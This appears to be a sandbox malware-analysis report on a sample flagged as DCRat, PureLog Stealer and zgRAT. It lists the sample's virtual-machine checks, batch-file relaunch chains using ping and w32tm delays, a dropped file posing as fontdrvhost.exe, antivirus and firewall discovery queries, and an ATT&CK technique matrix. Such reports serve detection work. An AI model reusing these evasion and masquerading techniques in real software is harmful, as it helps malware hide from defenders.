                        Source: fontdrvhost.exe, 0000001B.00000002.1998188991.000000001B434000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                        Source: ZT3pxe2Tb4.exe, 00000000.00000002.1670366434.000000001BF57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
                        Source: fontdrvhost.exe, 0000001B.00000002.2002667605.000000001C11C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                        Source: fontdrvhost.exe, 00000033.00000002.2716698642.000000001C591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\4
                        Source: fontdrvhost.exe, 00000023.00000002.2621783343.000000001B460000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                        Source: fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                        Source: fontdrvhost.exe, 00000023.00000002.2663073446.000000001BA16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                        Source: ZT3pxe2Tb4.exe, 00000000.00000002.1667261412.000000001B980000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: fontdrvhost.exe, 00000023.00000002.2621783343.000000001B517000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: fontdrvhost.exe, 00000022.00000002.2094701336.000000001C3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs%SystemRoot%\system32\mswsock.dll
                        Source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BFA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\DB-
                        Source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k'V
                        Source: fontdrvhost.exe, 0000001B.00000002.2004925843.000000001C16D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: fontdrvhost.exe, 00000008.00000002.1701655922.00000000009D0000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2103740621.000000001BD11000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000021.00000002.1974264152.00000269B5D97000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000028.00000002.2060434590.0000025FD088F000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2394390360.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000039.00000002.2290310341.0000024AEDA09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                        Source: fontdrvhost.exe, 00000033.00000002.2716698642.000000001C591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 0_2_00007FFD9BBD3600 rdtsc 0_2_00007FFD9BBD3600
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeQueries volume information: C:\Users\user\Desktop\ZT3pxe2Tb4.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeQueries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
                        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF70000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1745557106.000000001B0DC000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1998188991.000000001B3E9000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2653167450.000000001B950000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2103426522.0000000001896000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2494300205.000000001B141000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: ZT3pxe2Tb4.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
                        Yara detected zgRAT
                        Source: Yara matchFile source: ZT3pxe2Tb4.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: ZT3pxe2Tb4.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
                        Yara detected zgRAT
                        Source: Yara matchFile source: ZT3pxe2Tb4.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting                        		Valid Accounts241
                        Windows Management Instrumentation                        		1
                        Scheduled Task/Job                        		11
                        Process Injection                        		11
                        Masquerading                        		OS Credential Dumping251
                        Security Software Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job                        		1
                        Scripting                        		1
                        Scheduled Task/Job                        		1
                        Disable or Modify Tools                        		LSASS Memory1
                        Process Discovery                        		Remote Desktop ProtocolData from Removable Media2
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		151
                        Virtualization/Sandbox Evasion                        		Security Account Manager151
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                        Process Injection                        		NTDS1
                        Remote System Discovery                        		Distributed Component Object ModelInput Capture12
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information                        		LSA Secrets1
